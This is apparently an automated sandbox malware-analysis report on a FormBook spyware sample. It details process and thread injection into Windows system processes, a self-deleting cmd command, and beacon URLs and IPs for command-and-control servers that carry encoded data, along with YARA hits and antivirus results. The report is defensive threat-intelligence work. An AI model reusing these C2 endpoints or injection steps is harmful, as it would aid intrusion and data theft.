Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045C4D3B mov eax, dword ptr fs:[00000030h]	8_2_045C4D3B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0459AD30 mov eax, dword ptr fs:[00000030h]	8_2_0459AD30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045B4120 mov eax, dword ptr fs:[00000030h]	8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045B4120 mov eax, dword ptr fs:[00000030h]	8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045B4120 mov eax, dword ptr fs:[00000030h]	8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045B4120 mov eax, dword ptr fs:[00000030h]	8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045B4120 mov ecx, dword ptr fs:[00000030h]	8_2_045B4120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04648DF1 mov eax, dword ptr fs:[00000030h]	8_2_04648DF1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0459B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0459B1E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0459B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0459B1E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0459B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0459B1E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h]	8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h]	8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h]	8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h]	8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04592D8A mov eax, dword ptr fs:[00000030h]	8_2_04592D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045CA185 mov eax, dword ptr fs:[00000030h]	8_2_045CA185
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045BC182 mov eax, dword ptr fs:[00000030h]	8_2_045BC182
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045C35A1 mov eax, dword ptr fs:[00000030h]	8_2_045C35A1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0464B260 mov eax, dword ptr fs:[00000030h]	8_2_0464B260
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0464B260 mov eax, dword ptr fs:[00000030h]	8_2_0464B260
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h]	8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h]	8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h]	8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04599240 mov eax, dword ptr fs:[00000030h]	8_2_04599240
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D927A mov eax, dword ptr fs:[00000030h]	8_2_045D927A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0464FE3F mov eax, dword ptr fs:[00000030h]	8_2_0464FE3F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045C36CC mov eax, dword ptr fs:[00000030h]	8_2_045C36CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0464FEC0 mov eax, dword ptr fs:[00000030h]	8_2_0464FEC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04668ED6 mov eax, dword ptr fs:[00000030h]	8_2_04668ED6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045C16E0 mov ecx, dword ptr fs:[00000030h]	8_2_045C16E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04660EA5 mov eax, dword ptr fs:[00000030h]	8_2_04660EA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04660EA5 mov eax, dword ptr fs:[00000030h]	8_2_04660EA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04660EA5 mov eax, dword ptr fs:[00000030h]	8_2_04660EA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_046146A7 mov eax, dword ptr fs:[00000030h]	8_2_046146A7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045CD294 mov eax, dword ptr fs:[00000030h]	8_2_045CD294
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045CD294 mov eax, dword ptr fs:[00000030h]	8_2_045CD294
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0462FE87 mov eax, dword ptr fs:[00000030h]	8_2_0462FE87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h]	8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h]	8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h]	8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h]	8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045952A5 mov eax, dword ptr fs:[00000030h]	8_2_045952A5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04668F6A mov eax, dword ptr fs:[00000030h]	8_2_04668F6A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045AEF40 mov eax, dword ptr fs:[00000030h]	8_2_045AEF40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04668B58 mov eax, dword ptr fs:[00000030h]	8_2_04668B58
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0466070D mov eax, dword ptr fs:[00000030h]	8_2_0466070D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0466070D mov eax, dword ptr fs:[00000030h]	8_2_0466070D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045CE730 mov eax, dword ptr fs:[00000030h]	8_2_045CE730
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0462FF10 mov eax, dword ptr fs:[00000030h]	8_2_0462FF10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0462FF10 mov eax, dword ptr fs:[00000030h]	8_2_0462FF10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04594F2E mov eax, dword ptr fs:[00000030h]	8_2_04594F2E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04594F2E mov eax, dword ptr fs:[00000030h]	8_2_04594F2E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0465131B mov eax, dword ptr fs:[00000030h]	8_2_0465131B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04665BA5 mov eax, dword ptr fs:[00000030h]	8_2_04665BA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0465138A mov eax, dword ptr fs:[00000030h]	8_2_0465138A

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.secureproductsolutions.net
Source: C:\Windows\explorer.exe	Network Connect: 75.119.206.89 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.americacivics.com
Source: C:\Windows\explorer.exe	Domain query: www.vstarfireworks.com
Source: C:\Windows\explorer.exe	Network Connect: 43.249.29.43 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.186.238.101 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.dcsdeliveryaz.website

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Memory written: C:\Users\user\Desktop\ox87DNNM8d.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process created: C:\Users\user\Desktop\ox87DNNM8d.exe C:\Users\user\Desktop\ox87DNNM8d.exe			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe'			Jump to behavior

Source: explorer.exe, 00000004.00000000.250657770.0000000005EA0000.00000004.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000004.00000000.237331727.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000004.00000000.237977080.0000000001640000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.495697129.0000000003160000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Queries volume information: C:\Users\user\Desktop\ox87DNNM8d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.281369748.0000000001730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.281290291.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.493625427.0000000000AA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.234588732.0000000003F79000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492941508.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.ox87DNNM8d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection512	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	Input Capture1	Process Discovery2	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection512	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ox87DNNM8d.exe	57%	Virustotal		Browse
ox87DNNM8d.exe	41%	Metadefender		Browse
ox87DNNM8d.exe	66%	ReversingLabs	ByteCode-MSIL.Spyware.Noon

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.ox87DNNM8d.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
t181.deegeechina.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.vstarfireworks.com/sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da	0%	Avira URL Cloud	safe
http://www.americacivics.com/sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
www.panda810.com/sve/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.dcsdeliveryaz.website/sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.americacivics.com	35.186.238.101	true	false		unknown
t181.deegeechina.com	43.249.29.43	true	true	0%, Virustotal, Browse	unknown
www.dcsdeliveryaz.website	75.119.206.89	true	true		unknown
www.secureproductsolutions.net	unknown	unknown	true		unknown
www.vstarfireworks.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.vstarfireworks.com/sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da	true	Avira URL Cloud: safe	unknown
http://www.americacivics.com/sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE	false	Avira URL Cloud: safe	unknown
www.panda810.com/sve/	true	Avira URL Cloud: safe	low
http://www.dcsdeliveryaz.website/sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ox87DNNM8d.exe, 00000001.00000002.234176049.0000000002F71000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000004.00000000.263514865.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
35.186.238.101	www.americacivics.com	United States	15169	GOOGLEUS	false
75.119.206.89	www.dcsdeliveryaz.website	United States	26347	DREAMHOST-ASUS	true
43.249.29.43	t181.deegeechina.com	Hong Kong	133115	HKKFGL-AS-APHKKwaifongGroupLimitedHK	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	411767
Start date:	12.05.2021
Start time:	06:27:57
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ox87DNNM8d.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@4/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 28% (good quality ratio 25.8%) Quality average: 69.6% Quality standard deviation: 31.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 88 Number of non-executed functions: 73
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Simulations

Behavior and APIs

Time	Type	Description
06:28:47	API Interceptor	1x Sleep call for process: ox87DNNM8d.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DREAMHOST-ASUS	ENCORE.docx	Get hash	malicious	Browse	64.90.45.190
	4GGwmv0AJm.exe	Get hash	malicious	Browse	69.163.200.146
	documents-857527454.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-857527454.xlsm	Get hash	malicious	Browse	67.205.36.230
	70pGP1JaCf6M0kf.exe	Get hash	malicious	Browse	173.236.152.151
	documents-1509207685.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-1509207685.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-1576257262.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-1576257262.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-26926602.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-26926602.xlsm	Get hash	malicious	Browse	67.205.36.230
